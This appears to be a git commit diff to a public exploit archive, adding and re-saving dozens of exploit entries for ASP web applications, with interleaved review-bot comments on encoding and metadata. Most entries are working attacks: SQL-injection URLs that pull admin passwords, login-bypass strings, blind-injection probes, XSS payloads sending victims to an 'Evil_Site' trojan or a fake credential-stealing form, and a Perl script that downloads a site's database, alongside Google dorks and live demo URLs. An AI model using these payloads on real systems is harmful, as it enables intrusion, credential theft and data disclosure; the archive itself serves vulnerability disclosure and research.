Updated 12_12_2013

This commit is contained in:
Offensive Security 2013-12-12 21:02:26 +00:00
parent 5a468df6b9
commit 6bd122cd4b
229 changed files with 17060 additions and 13228 deletions

2940
files.csv

File diff suppressed because it is too large

View file

@ -284,6 +284,6 @@ bash-2.05b#
bash-2.05b# rm /tmp/.bel*
bash-2.05b# rm /tmp/passwd
bash-2.05b#
# milw0rm.com [2005-05-19]
# milw0rm.com [2005-05-19]
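Review bot: the old and new sides of this hunk (the two `# milw0rm.com [2005-05-19]` lines at its end) are textually identical, so the only change can be whitespace or line endings, and the commit message `Updated 12_12_2013` does not say so. State the normalization in the commit message, or add a `.gitattributes` rule for the text files, so that a reviewer of the 229 touched files can tell a byte-only change from an edited exploit.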

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24288/info
Hünkaray Okul Portalý is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
Hünkaray Okul Portalý 1.1 is vulnerable to this issue.
http://www.example.com/okul/haberoku.asp?id=11%20union+select+0,sifre,kullaniciadi,3,4+from+admin
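Review bot: the product name reads `Hünkaray Okul Portalý` in the title and affected-version lines of the new file; the `ý` is a Windows-1254 `ı` decoded as Latin-1, so the file was added with a broken encoding. Re-save it as UTF-8 from the original advisory text before committing, since the product name is what the archive will be searched on.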

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24345/info
ASP Folder Gallery is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the affected webserver.
http://www.example.com/aspfoldergallery/download_script.asp?file=viewimage.asp
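Review bot: the new file gives no affected version (compare the "1.1 is vulnerable to this issue" line in the neighbouring BID-sourced entries), and its only PoC requests `viewimage.asp` from the gallery's own directory, which does not demonstrate the "arbitrary files" claim in the description. Add the version from the BID 24345 source and state which files the `file=` parameter can reach, rather than leaving the reader to infer it.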

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24379/info
Ibrahim Ã?AKICI Okul Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
Ibrahim Ã?AKICI Okul Portal 2.0 is vulnerable to this issue.
http://www.example.com/haber_oku.asp?id=9%20union+select+0,sifre,kulladi,3,4,5,6+from+uyeler
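Review bot: `Ibrahim Ã?AKICI` in the title and affected-version lines is mis-decoded UTF-8 (an `Ã` followed by an unprintable byte is the two-byte encoding of a single accented capital letter), so the author's name was corrupted on the way into the archive. Fix it in the source file instead of committing the mojibake; the Hünkaray entry above has the same class of error in a different code page.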

20
platforms/asp/webapps/30195.txt Executable file
View file

@ -0,0 +1,20 @@
#********************************************************************************
# Exploit Title : Webnet Studio Sql Injection Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://www.webnetstudio.it
#
# Google Dork : intext:"powered by Webnet Studio"
#
# Date: 2013-12-10
#
# Tested on: Windows 7 , Linux
#
# discovered by : ACC3SS
-------------------------------------------------------------------
# Exploit : Sql Injection
#
# Location : [Target]/content.asp?ID=[Sql Injection]
#
######################
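Review bot: the header block names an SQL injection at `[Target]/content.asp?ID=[Sql Injection]` but records nothing a reader could verify: no affected version, no vendor response, and no observed behaviour (error message or true/false condition) that distinguishes an injectable `ID` from a site that merely echoes the parameter. Add at least the version tested and the evidence seen; `Tested on: Windows 7 , Linux` describes the author's client, not the server and database the finding applies to. The bare `-------` line also breaks the file's own `#` comment convention.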

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24515/info
TDizin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/TDizin/arama.asp?ara= "><script>alert("G3");</script>&submit=+T%27ARA+

11
platforms/asp/webapps/30203.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24562/info
Comersus Cart is affected by multiple input validation vulnerabilities.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.
http://www.example.com/store/comersus_optReviewReadExec.asp?idProduct='
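Review bot: the description paragraph is the generic BID 24562 text covering both the database-side and the script-injection issues, and it is repeated verbatim in 30204.txt and 30205.txt below, while each file's PoC exercises a different issue; here the lone single quote in `idProduct` only shows the SQL-side input validation failure. Have each of the three files state which parameter and which issue class its PoC demonstrates, so the entries are distinguishable by more than their URL.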

11
platforms/asp/webapps/30204.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24562/info
Comersus Cart is affected by multiple input validation vulnerabilities.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.
http://www.example.com/path/store/comersus_customerAuthenticateForm.asp?redirectUrl="><script>window.location="http://www.Evil_Site.com/Trojan.exe"</script>

11
platforms/asp/webapps/30205.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24562/info
Comersus Cart is affected by multiple input validation vulnerabilities.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.
http://www.example.com/path/store/comersus_message.asp?message=<script src=http://www.Site.com/Evil_Script.js></script> http://www.example.com/path/store/comersus_message.asp?message=<form%20action="http://www.Evil_Site.com/Steal_Info.asp"%20method="post">Username:<input%20name="username"%20type="text"%20maxlength="10"><br>Password:<input%20name="password"%2 0type="text"%20maxlength="10"><br><input%20name="login"%20type="submit"%20value ="Login"></form>
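Review bot: the PoC line for `comersus_message.asp` has been damaged by line wrapping: two URLs are run together on one line, and the second contains `%2 0type` and `value ="Login"`, where a space has been inserted inside a percent-escape and inside an attribute, so the stored payload is not what the BID 24562 source published. Split the two URLs onto separate lines and restore the escapes from the source before committing, since the archive file is meant to be the reference copy.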

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24563/info
FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/blog/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=[xss]

View file

@ -1,18 +1,18 @@
#Title : Active Trade Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page : http://www.activewebsoftwares.com/demoactivetrade
#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=32
#Vuln.
#Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1
#Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1
#Admin Login : /admin.asp
====================================
Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3
And All TURKISH HACKERS !
# milw0rm.com [2007-03-23]
#Title : Active Trade Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page : http://www.activewebsoftwares.com/demoactivetrade
#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=32
#Vuln.
#Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1
#Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1
#Admin Login : /admin.asp
====================================
Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3
And All TURKISH HACKERS !
# milw0rm.com [2007-03-23]

View file

@ -1,15 +1,15 @@
/*
OpenASP <= 3.0 Blind SQL Injection Vulnerability
-----------------------------------------------------
by athos - staker[at]hotmail[dot]it
thanks XaDoS,anyway i've found another sql injection
http://openasp.it
-----------------------------------------------------
default.asp?modulo=pages&idpage=1 or 1=1 (true)
default.asp?modulo=pages&idpage=1 or 1=2 (false)
default.asp?modulo=pages&idpage=-1 and substring(@@version,1,1)=4/*
*/
# milw0rm.com [2008-11-17]
/*
OpenASP <= 3.0 Blind SQL Injection Vulnerability
-----------------------------------------------------
by athos - staker[at]hotmail[dot]it
thanks XaDoS,anyway i've found another sql injection
http://openasp.it
-----------------------------------------------------
default.asp?modulo=pages&idpage=1 or 1=1 (true)
default.asp?modulo=pages&idpage=1 or 1=2 (false)
default.asp?modulo=pages&idpage=-1 and substring(@@version,1,1)=4/*
*/
# milw0rm.com [2008-11-17]

View file

@ -1,42 +1,42 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor: www.activewebsoftwares.com
[~]Software: Active Membership v 2
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------{str0ke}------------------------------
[~] Exploit:
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~]login 4 d3m0:
http://www.activewebsoftwares.com/demoactivemembership/account.asp
[~]-----------------------------{str0ke}---------------------------------------------------
[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor: www.activewebsoftwares.com
[~]Software: Active Membership v 2
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------{str0ke}------------------------------
[~] Exploit:
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~]login 4 d3m0:
http://www.activewebsoftwares.com/demoactivemembership/account.asp
[~]-----------------------------{str0ke}---------------------------------------------------
[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]

View file

@ -1,45 +1,45 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
وما أوتيتم من العلم الا قليلا
[~]-------------------------------صدق الله العظيم-------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor: www.activewebsoftwares.com
[~]Software: eWebquiz v 8
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------{str0ke}------------------------------
[~] Exploit:
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~]login 4 d3m0:
http://www.activewebsoftwares.com/demoewebquiz/register.asp
[~]-----------------------------{str0ke}---------------------------------------------------
[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
وما أوتيتم من العلم الا قليلا
[~]-------------------------------صدق الله العظيم-------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor: www.activewebsoftwares.com
[~]Software: eWebquiz v 8
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------{str0ke}------------------------------
[~] Exploit:
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~]login 4 d3m0:
http://www.activewebsoftwares.com/demoewebquiz/register.asp
[~]-----------------------------{str0ke}---------------------------------------------------
[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]

View file

@ -1,45 +1,45 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor: www.activewebsoftwares.com
[~]Software: Active Web Mail v 4
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------{str0ke}------------------------------
[~] Exploit:
Email: any mail
password: r0' or ' 1=1--
[~]login 4 d3m0:
www.activewebsoftwares.com/DemoActiveWebmail/login.aspx
[~]-----------------------------{str0ke}---------------------------------------------------
[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor: www.activewebsoftwares.com
[~]Software: Active Web Mail v 4
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------{str0ke}------------------------------
[~] Exploit:
Email: any mail
password: r0' or ' 1=1--
[~]login 4 d3m0:
www.activewebsoftwares.com/DemoActiveWebmail/login.aspx
[~]-----------------------------{str0ke}---------------------------------------------------
[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]

View file

@ -1,68 +1,68 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(emails.aspx TabOpenQuickTab1) Blind SQL Injection Vulnerability
[~]Vendor:www.activewebsoftwares.com
[~]Software: Active Web Mail v 4
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------------------------------------
[~]3xpL0!7 4 d3m0:
www.activewebsoftwares.com/DemoActiveWebmail/popaccounts.aspx?TabOpenQuickTab1={bL!ND}
0R
www.activewebsoftwares.com/DemoActiveWebmail/addressbook.aspx?TabOpenQuickTab1={str0ke}
www.activewebsoftwares.com/DemoActiveWebmail/emails.aspx?TabOpenQuickTab1=((я3d D3v!L))
[~] 8L!/\/D:
7Ru3 : popaccounts.aspx?TabOpenQuickTab1=1 and 1=1
f4L53: popaccounts.aspx?TabOpenQuickTab1=1 and 1=2
0R
7Ru3 : addressbook.aspx?TabOpenQuickTab1=1 and 1=1
f4L53: addressbook.aspx?TabOpenQuickTab1=1 and 1=2
7Ru3 : emails.aspx?TabOpenQuickTab1=1 and 1=1
f4L53: emails.aspx?TabOpenQuickTab1=1 and 1=2
N073:
! 7h!/\/k u can f!nd m0r3
just let your m1nd breath ;)
[~]--------------------------------------------------------------------------------
[~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري
[~]
[~] spechial thanks : dolly & 7am3m & عماد & {str0ke}
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(emails.aspx TabOpenQuickTab1) Blind SQL Injection Vulnerability
[~]Vendor:www.activewebsoftwares.com
[~]Software: Active Web Mail v 4
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------------------------------------
[~]3xpL0!7 4 d3m0:
www.activewebsoftwares.com/DemoActiveWebmail/popaccounts.aspx?TabOpenQuickTab1={bL!ND}
0R
www.activewebsoftwares.com/DemoActiveWebmail/addressbook.aspx?TabOpenQuickTab1={str0ke}
www.activewebsoftwares.com/DemoActiveWebmail/emails.aspx?TabOpenQuickTab1=((я3d D3v!L))
[~] 8L!/\/D:
7Ru3 : popaccounts.aspx?TabOpenQuickTab1=1 and 1=1
f4L53: popaccounts.aspx?TabOpenQuickTab1=1 and 1=2
0R
7Ru3 : addressbook.aspx?TabOpenQuickTab1=1 and 1=1
f4L53: addressbook.aspx?TabOpenQuickTab1=1 and 1=2
7Ru3 : emails.aspx?TabOpenQuickTab1=1 and 1=1
f4L53: emails.aspx?TabOpenQuickTab1=1 and 1=2
N073:
! 7h!/\/k u can f!nd m0r3
just let your m1nd breath ;)
[~]--------------------------------------------------------------------------------
[~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري
[~]
[~] spechial thanks : dolly & 7am3m & عماد & {str0ke}
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]

View file

@ -1,66 +1,66 @@
***********************************************************************************************************************************************************
[!] [!]
[!] OOOO O OOOOOOOOO [!]
[!] O O O O O [!]
[!] O O O [!]
[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!]
[!] O OOO OOO O O O O OO O O O O OO O O O [!]
[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!]
[!] O O OOOO O O O O O O O O O O O [!]
[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!]
[!] OO [!]
[!] OO [!]
[!] OO Proud To Be MoroCCaN [!]
[!] OO WwW.Exploiter5.CoM , WwW.No-Exploit.CoM , WwW.IQ-TY.CoM [!]
***********************************************************************************************************************************************************
+---- Bismi Allah Irahmani ArraHim ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [ Active Web Helpdesk v 2 (Auth Bypass) SQL Injection Vulnerability ] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
: Author : Cyber-Zone ( Abdelkhalek ) : : :
¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦
¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦
¦ TeaM : Mor0ccan nightamres ¦ ¦ ¦
¦ Script : http://activewebsoftwares.com ¦ ¦ ![ ]! ¦
¦ Download : http://activewebsoftwares.com/P12_ActiveWebHelpdesk.aspx?Tabopen= ¦ ¦ ¦
¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦
¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦
¦ From The Dark Side Of MoroCCo ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
: :
¦ Remember : ¦
¦ ------------- ¦
¦ ¦
¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦
¦ ¦
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [!] RaHa NaYda NoooooooooooD ; Anti-Connexion Den MouK [!] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
Bypass : ........
Go To The Admin Panel.
and Login with this information :
username : r0' or ' 1=1--
password : r0' or ' 1=1--
To Test :
http://activewebsoftwares.com/demoactivewebhelpdesk/adminlogin.aspx?ReturnURL=admindefault.aspx
EnjoY.
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
+---- ThanX To ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ str0ke , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
= [AttaCk Is CompLet] =
___________________________________________________________________________________________________________________________________________________________
# milw0rm.com [2008-11-29]
***********************************************************************************************************************************************************
[!] [!]
[!] OOOO O OOOOOOOOO [!]
[!] O O O O O [!]
[!] O O O [!]
[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!]
[!] O OOO OOO O O O O OO O O O O OO O O O [!]
[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!]
[!] O O OOOO O O O O O O O O O O O [!]
[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!]
[!] OO [!]
[!] OO [!]
[!] OO Proud To Be MoroCCaN [!]
[!] OO WwW.Exploiter5.CoM , WwW.No-Exploit.CoM , WwW.IQ-TY.CoM [!]
***********************************************************************************************************************************************************
+---- Bismi Allah Irahmani ArraHim ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [ Active Web Helpdesk v 2 (Auth Bypass) SQL Injection Vulnerability ] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
: Author : Cyber-Zone ( Abdelkhalek ) : : :
¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦
¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦
¦ TeaM : Mor0ccan nightamres ¦ ¦ ¦
¦ Script : http://activewebsoftwares.com ¦ ¦ ![ ]! ¦
¦ Download : http://activewebsoftwares.com/P12_ActiveWebHelpdesk.aspx?Tabopen= ¦ ¦ ¦
¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦
¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦
¦ From The Dark Side Of MoroCCo ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
: :
¦ Remember : ¦
¦ ------------- ¦
¦ ¦
¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦
¦ ¦
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [!] RaHa NaYda NoooooooooooD ; Anti-Connexion Den MouK [!] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
Bypass : ........
Go To The Admin Panel.
and Login with this information :
username : r0' or ' 1=1--
password : r0' or ' 1=1--
To Test :
http://activewebsoftwares.com/demoactivewebhelpdesk/adminlogin.aspx?ReturnURL=admindefault.aspx
EnjoY.
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
+---- ThanX To ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ str0ke , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
= [AttaCk Is CompLet] =
___________________________________________________________________________________________________________________________________________________________
# milw0rm.com [2008-11-29]

View file

@ -1,52 +1,52 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(calendar_Eventupdate.asp ID) Blind SQL Injection Vulnerability
[~]Vendor: www.mxmania.net
[~]Software: Calendar Mx Professional
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] --------------------------------{str0ke}---------------------------
[~]3xpL0!7 4 d3m0:
http://calendar.mxmania.net/calendar_Eventupdate.asp?ID={bL!ND}
[~] 8L!/\/D:
7Ru3 : calendar_Eventupdate.asp?ID=1 and 1=1
f4L53: calendar_Eventupdate.asp?ID=1 and 1=2
N073:
! 7h!/\/k u can f!nd m0r3
just let your m1nd breath ;)
[[~]----------------------------------------{str0ke}----------------------------------------------
[~] Greetz tO: {str0ke} & c08RA & black_R0se& maxmos & EV!L KS@ & hesham_hacker &EL z0herY
[~]
[~] spechial thanks : dolly & 7am3m & W4L3d ? & {str0ke}
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]-----------------------------------------{str0ke}----------------------------------------------
# milw0rm.com [2008-12-03]
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(calendar_Eventupdate.asp ID) Blind SQL Injection Vulnerability
[~]Vendor: www.mxmania.net
[~]Software: Calendar Mx Professional
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] --------------------------------{str0ke}---------------------------
[~]3xpL0!7 4 d3m0:
http://calendar.mxmania.net/calendar_Eventupdate.asp?ID={bL!ND}
[~] 8L!/\/D:
7Ru3 : calendar_Eventupdate.asp?ID=1 and 1=1
f4L53: calendar_Eventupdate.asp?ID=1 and 1=2
N073:
! 7h!/\/k u can f!nd m0r3
just let your m1nd breath ;)
[[~]----------------------------------------{str0ke}----------------------------------------------
[~] Greetz tO: {str0ke} & c08RA & black_R0se& maxmos & EV!L KS@ & hesham_hacker &EL z0herY
[~]
[~] spechial thanks : dolly & 7am3m & W4L3d ? & {str0ke}
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]-----------------------------------------{str0ke}----------------------------------------------
# milw0rm.com [2008-12-03]

View file

@ -1,51 +1,51 @@
#!/usr/bin/perl
#
#
# Ublog access version
# mdb-database/blog.mdb
# dork : http://www.google.co.ma/search?q=index.asp%3Farchivio%3DOK&hl=fr&start=20&sa=N
# demos :
# http://radiologyhunters.com/blog/mdb-database/blog.mdb
# http://foges.net/mdb-database/blog.mdb
# http://www.geoaurea.it/mdb-database/blog.mdb
#
#
use LWP::Simple;
use LWP::UserAgent;
print "\tUblog access version Arbitrary Database Disclosure Exploit\n";
print "\t****************************************************************\n";
print "\t* Found And Exploited By : Cyber-Zone (ABDELKHALEK) *\n";
print "\t* E-mail : Paradis_des_fous[at]hotmail.fr *\n";
print "\t* Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM *\n";
print "\t* From : MoroccO Figuig/Oujda City *\n";
print "\t****************************************************************\n\n\n\n";
if(@ARGV < 1)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 site \n";
print "[X] Exemple : perl $0 www.site.com \n";
}
($site) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");
sleep(5);
$database = "mdb-database/blog.mdb";
my $exploit = "http://" . $site . "/" . $database;
print("Searching For file ...\n\n");
sleep(3);
$doexploit=get $exploit;
if($doexploit){
print("..........................File Contents...........................\n");
print("$doexploit\n");
print("..............................EOF.................................\n");
}
else {
help();
exit;
}
# milw0rm.com [2009-05-04]
#!/usr/bin/perl
#
#
# Ublog access version
# mdb-database/blog.mdb
# dork : http://www.google.co.ma/search?q=index.asp%3Farchivio%3DOK&hl=fr&start=20&sa=N
# demos :
# http://radiologyhunters.com/blog/mdb-database/blog.mdb
# http://foges.net/mdb-database/blog.mdb
# http://www.geoaurea.it/mdb-database/blog.mdb
#
#
use LWP::Simple;
use LWP::UserAgent;
print "\tUblog access version Arbitrary Database Disclosure Exploit\n";
print "\t****************************************************************\n";
print "\t* Found And Exploited By : Cyber-Zone (ABDELKHALEK) *\n";
print "\t* E-mail : Paradis_des_fous[at]hotmail.fr *\n";
print "\t* Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM *\n";
print "\t* From : MoroccO Figuig/Oujda City *\n";
print "\t****************************************************************\n\n\n\n";
if(@ARGV < 1)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 site \n";
print "[X] Exemple : perl $0 www.site.com \n";
}
($site) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");
sleep(5);
$database = "mdb-database/blog.mdb";
my $exploit = "http://" . $site . "/" . $database;
print("Searching For file ...\n\n");
sleep(3);
$doexploit=get $exploit;
if($doexploit){
print("..........................File Contents...........................\n");
print("$doexploit\n");
print("..............................EOF.................................\n");
}
else {
help();
exit;
}
# milw0rm.com [2009-05-04]
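Review bot: the `else` branch at the end of the script calls `help()` whenever `get` returns nothing, so a host without `mdb-database/blog.mdb` (or any HTTP error, since `LWP::Simple::get` returns undef on failure) is reported as a usage mistake rather than as "file not found"; print a distinct message there. `use LWP::UserAgent` is never used, and `sub help()` is declared with an empty prototype but first called as `&help`, which bypasses prototypes; drop both. The `# demos :` header lists three live third-party sites by full database URL, which should not be kept in the archive file, and `Exemple` in the usage text is a typo.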

View file

@ -1,237 +1,237 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[libc:fts_*():multiple vendors, Denial-of-service ]
Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 21.10.2008
- - Pub.: 04.03.2009
